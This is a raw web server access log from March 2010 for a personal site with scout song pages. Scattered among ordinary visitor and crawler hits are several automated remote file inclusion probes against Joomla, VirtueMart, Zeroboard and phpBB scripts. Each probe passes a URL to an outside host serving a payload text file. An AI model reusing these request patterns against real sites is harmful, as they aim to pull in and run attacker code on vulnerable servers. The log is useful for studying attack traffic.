61.43.89.13 - - [01/Mar/2010:18:36:55 -0800] "GET /~daveh//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/export.php "-" "Mozilla/5.0" 0 www.accesscom.com
61.43.89.13 - - [01/Mar/2010:18:36:55 -0800] "GET /~daveh/logs/access.log//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
207.46.194.170 - - [01/Mar/2010:18:38:22 -0800] "GET /~daveh/sean/monty/Python3.GIF HTTP/1.1" 200 29496 /home/users/d/daveh/public_html/sean/monty/Python3.GIF "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
207.46.204.211 - - [01/Mar/2010:18:43:25 -0800] "GET /~daveh/photos/?S=D HTTP/1.1" 200 1292 /home/users/d/daveh/public_html/photos/ "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1)" 0 www.accesscom.com
99.226.156.184 - - [01/Mar/2010:18:44:58 -0800] "GET /~daveh/sean/song/pbsong1.html HTTP/1.1" 200 41905 /home/users/d/daveh/public_html/sean/song/pbsong1.html "http://www.google.ca/search?sourceid=navclient&aq=0&oq=ding+ding+ding+there+goes+my&ie=UTF-8&rlz=1T4GGLL_enCA355CA355&q=ding+ding+ding+there+goes+my+wagon" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)" 0 www.accesscom.com
85.233.162.101 - - [01/Mar/2010:18:46:38 -0800] "GET /~daveh/logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 345 /home/users/d/daveh/public_html/logs////components "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [01/Mar/2010:18:46:38 -0800] "GET /~daveh////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 340 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [01/Mar/2010:18:46:38 -0800] "GET /~daveh/logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 358 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
67.195.115.58 - - [01/Mar/2010:19:00:02 -0800] "GET /%7edaveh/sean/song/pbsong0.html HTTP/1.0" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
76.117.0.52 - - [01/Mar/2010:19:01:45 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 0 www.accesscom.com
76.117.0.52 - - [01/Mar/2010:19:01:46 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 0 www.accesscom.com
76.117.0.52 - - [01/Mar/2010:19:01:46 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.google.com/search?q=i%27ve+got+a+whale+of+a+tale+to+tell+you+lads&rls=com.microsoft:en-us:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7GGHP_en" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
67.195.115.58 - - [01/Mar/2010:19:04:45 -0800] "GET /~daveh/logs/Oct03.html HTTP/1.0" 200 12067 /home/users/d/daveh/public_html/logs/Oct03.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
77.240.113.151 - - [01/Mar/2010:19:10:28 -0800] "GET /~daveh/logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs///index.php "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.accesscom.com
207.46.204.195 - - [01/Mar/2010:19:12:14 -0800] "GET /~daveh/case/?M=A HTTP/1.1" 200 1925 /home/users/d/daveh/public_html/case/ "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
77.240.113.151 - - [01/Mar/2010:19:21:49 -0800] "GET /~daveh/logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs///index.php "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.accesscom.com
77.240.113.151 - - [01/Mar/2010:19:27:25 -0800] "GET /~daveh/logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs///index.php "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.accesscom.com
75.169.69.250 - - [01/Mar/2010:19:32:39 -0800] "GET /~daveh/sean/song/pbsong2.html HTTP/1.1" 200 54080 /home/users/d/daveh/public_html/sean/song/pbsong2.html "http://www.google.com/search?hl=en&source=hp&q=the+thousand+legged+worm+song&cts=1267500709668&aq=f&aqi=&aql=&oq=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)" 0 www.access
75.169.69.250 - - [01/Mar/2010:19:32:49 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?hl=en&source=hp&q=the+thousand+legged+worm+song&cts=1267500709668&aq=f&aqi=&aql=&oq=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)" 0 www.access
75.169.69.250 - - [01/Mar/2010:19:32:49 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.2)" 0 www.accesscom.com
207.46.195.237 - - [01/Mar/2010:19:35:44 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/pbsong0.html "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
75.17.226.39 - - [01/Mar/2010:19:38:58 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/url?sa=t&source=web&ct=res&cd=1&ved=0CAgQFjAA&url=http%3A%2F%2Fwww.accesscom.com%2F~daveh%2Fsean%2Fsong%2Fpbsong0.html&rct=j&q=cub+scout+song+book&ei=S4iMS52LCJDSM733mW4&usg=AFQjCNHgP_ZfZ8RDWfQrUYY2iGKek6ZZ3w" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .N
75.17.226.39 - - [01/Mar/2010:19:38:59 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 0 www.accesscom.com
75.17.226.39 - - [01/Mar/2010:19:39:13 -0800] "GET /~daveh/sean/song/pbsong1.html HTTP/1.1" 200 41905 /home/users/d/daveh/public_html/sean/song/pbsong1.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 0 www.accesscom.com
95.170.245.35 - - [01/Mar/2010:19:39:19 -0800] "GET /~daveh/logs/access.log/login.php?_zb_path=http://www.abcoroti.com/~starboy/img/blank.gif?? HTTP/1.1" 404 312 /home/users/d/daveh/public_html/logs/access.log "-" "libwww-perl/5.808" 0 www.accesscom.com
95.170.245.35 - - [01/Mar/2010:19:39:20 -0800] "GET /~daveh/logs/login.php?_zb_path=http://www.abcoroti.com/~starboy/img/blank.gif?? HTTP/1.1" 404 301 /home/users/d/daveh/public_html/logs/login.php "-" "libwww-perl/5.808" 0 www.accesscom.com
95.170.245.35 - - [01/Mar/2010:19:42:33 -0800] "GET /~daveh/logs/access.log/delete_all.php?phpbb_root_path=http://www.abcoroti.com/~starboy/img/blank.gif?? HTTP/1.1" 404 317 /home/users/d/daveh/public_html/logs/access.log "-" "libwww-perl/5.808" 0 www.accesscom.com
95.170.245.35 - - [01/Mar/2010:19:42:34 -0800] "GET /~daveh/logs/delete_all.php?phpbb_root_path=http://www.abcoroti.com/~starboy/img/blank.gif?? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/logs/delete_all.php "-" "libwww-perl/5.808" 0 www.accesscom.com
77.240.113.151 - - [01/Mar/2010:19:52:02 -0800] "GET /~daveh/logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs///index.php "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.accesscom.com
208.115.111.248 - - [01/Mar/2010:19:56:46 -0800] "GET /~daveh/sean/song/index.html HTTP/1.1" 404 307 /home/users/d/daveh/public_html/sean/song/index.html "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:10:50 -0800] "GET /~daveh/logs/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 310 /home/users/d/daveh/public_html/logs/////delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:10:50 -0800] "GET /~daveh/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 305 /home/users/d/daveh/public_html/delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:10:50 -0800] "GET /~daveh/logs/access.log/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 321 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:11:06 -0800] "GET /~daveh/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 305 /home/users/d/daveh/public_html/delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:11:07 -0800] "GET /~daveh/logs/access.log/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 321 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:11:07 -0800] "GET /~daveh/logs/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 310 /home/users/d/daveh/public_html/logs/////delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:11:10 -0800] "GET /~daveh/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 305 /home/users/d/daveh/public_html/delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:11:10 -0800] "GET /~daveh/logs/access.log/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 321 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:11:10 -0800] "GET /~daveh/logs/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 310 /home/users/d/daveh/public_html/logs/////delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:11:12 -0800] "GET /~daveh/logs/access.log/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 321 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:11:13 -0800] "GET /~daveh/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 305 /home/users/d/daveh/public_html/delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:11:14 -0800] "GET /~daveh/logs/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 310 /home/users/d/daveh/public_html/logs/////delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:11:25 -0800] "GET /~daveh/logs/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 310 /home/users/d/daveh/public_html/logs/////delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:11:25 -0800] "GET /~daveh/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 305 /home/users/d/daveh/public_html/delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
210.205.6.233 - - [01/Mar/2010:20:11:25 -0800] "GET /~daveh/logs/access.log/////delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 321 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
77.240.113.151 - - [01/Mar/2010:20:12:01 -0800] "GET /~daveh/logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs///index.php "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.accesscom.com
110.45.145.178 - - [01/Mar/2010:20:15:56 -0800] "GET /~daveh/logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 355 /home/users/d/daveh/public_html/logs/access.log "-" "libwww-perl/5.79" 0 www.accesscom.com
110.45.145.178 - - [01/Mar/2010:20:15:58 -0800] "GET /~daveh/logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 344 /home/users/d/daveh/public_html/logs///administrator "-" "libwww-perl/5.79" 0 www.accesscom.com
70.48.74.35 - - [01/Mar/2010:20:18:58 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" 0 www.accesscom.com
70.48.74.35 - - [01/Mar/2010:20:18:58 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" 0 www.accesscom.com
70.48.74.35 - - [01/Mar/2010:20:18:59 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.google.ca/search?hl=en&source=hp&q=songs+to+make+cheers+out+of&btnG=Google+Search&meta=&aq=f&oq=" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" 1 www.accesscom.com
77.240.113.151 - - [01/Mar/2010:20:27:50 -0800] "GET /~daveh/logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs///index.php "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.accesscom.com
71.167.171.202 - - [01/Mar/2010:20:30:12 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" 0 www.accesscom.com
71.167.171.202 - - [01/Mar/2010:20:30:12 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" 0 www.accesscom.com
71.167.171.202 - - [01/Mar/2010:20:30:13 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://searchwithdrake.swagbucks.com/?t=w&p=1&b=1&q=catch+a+tiger+by+the+nose+if+he+hollars" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" 1 www.accesscom.com
207.46.199.52 - - [01/Mar/2010:20:30:44 -0800] "GET /~daveh/sean/song/pbsong4.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/pbsong4.html "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
163.30.102.149 - - [01/Mar/2010:20:34:58 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ZHTW)" 0 www.accesscom.com
163.30.102.149 - - [01/Mar/2010:20:34:59 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ZHTW)" 0 www.accesscom.com
163.30.102.149 - - [01/Mar/2010:20:35:03 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ZHTW)" 5 www.accesscom.com
61.19.157.37 - - [01/Mar/2010:20:42:42 -0800] "GET /~daveh/logs/bbs/write_update.php?board_skin_path=http://www.abcoroti.com/~starboy/img/blank.gif?? HTTP/1.1" 404 312 /home/users/d/daveh/public_html/logs/bbs "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" 0 www.accesscom.com
61.19.157.37 - - [01/Mar/2010:20:42:42 -0800] "GET /~daveh/logs/access.log/bbs/write_update.php?board_skin_path=http://www.abcoroti.com/~starboy/img/blank.gif?? HTTP/1.1" 404 323 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" 0 www.accesscom.com
88.191.94.188 - - [01/Mar/2010:20:47:53 -0800] "GET /~daveh/logs/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://party-spicker.de/cache/sc1? HTTP/1.1" 404 310 /home/users/d/daveh/public_html/logs/admin_settings.php "-" "Mozilla/5.0" 0 www.accesscom.com
88.191.94.188 - - [01/Mar/2010:20:47:53 -0800] "GET /~daveh/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://party-spicker.de/cache/sc1? HTTP/1.1" 404 305 /home/users/d/daveh/public_html/admin_settings.php "-" "Mozilla/5.0" 0 www.accesscom.com
88.191.94.188 - - [01/Mar/2010:20:47:53 -0800] "GET /~daveh/logs/access.log/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://party-spicker.de/cache/sc1? HTTP/1.1" 404 321 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.143.198 - - [01/Mar/2010:20:48:55 -0800] "GET /~daveh/logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 347 /home/users/d/daveh/public_html/logs/access.log "-" "libwww-perl/5.834" 0 www.accesscom.com
174.37.143.198 - - [01/Mar/2010:20:48:55 -0800] "GET /~daveh/logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 336 /home/users/d/daveh/public_html/logs//components "-" "libwww-perl/5.834" 0 www.accesscom.com
97.115.202.131 - - [01/Mar/2010:20:56:46 -0800] "GET /~daveh/sunset-pink-big.jpg HTTP/1.1" 200 758233 /home/users/d/daveh/public_html/sunset-pink-big.jpg "http://www.myspace.com/nina_rose07" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; Qwest 1.0; Zune 3.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Qwest 1.0)" 7 www.accesscom.com
85.233.162.101 - - [01/Mar/2010:20:59:24 -0800] "GET /~daveh/logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 337 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [01/Mar/2010:20:59:24 -0800] "GET /~daveh/logs//skin/zero_vote/ask_password.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs//skin "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [01/Mar/2010:20:59:24 -0800] "GET /~daveh//skin/zero_vote/ask_password.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 319 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
77.240.113.151 - - [01/Mar/2010:21:06:27 -0800] "GET /~daveh/logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs///index.php "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.accesscom.com
174.51.137.27 - - [01/Mar/2010:21:07:55 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://search.yahoo.com/search?p=boy+scout+songs&toggle=1&cop=mss&ei=UTF-8&fr=yfp-t-701" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 0 www.accesscom.com
174.51.137.27 - - [01/Mar/2010:21:07:55 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 0 www.accesscom.com
174.51.137.27 - - [01/Mar/2010:21:08:10 -0800] "GET /~daveh/sean/song/pbsong2.html HTTP/1.1" 200 54080 /home/users/d/daveh/public_html/sean/song/pbsong2.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 1 www.accesscom.com
66.227.163.32 - - [01/Mar/2010:21:13:36 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" 0 www.accesscom.com
66.227.163.32 - - [01/Mar/2010:21:13:36 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" 0 www.accesscom.com
66.227.163.32 - - [01/Mar/2010:21:13:37 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" 0 www.accesscom.com
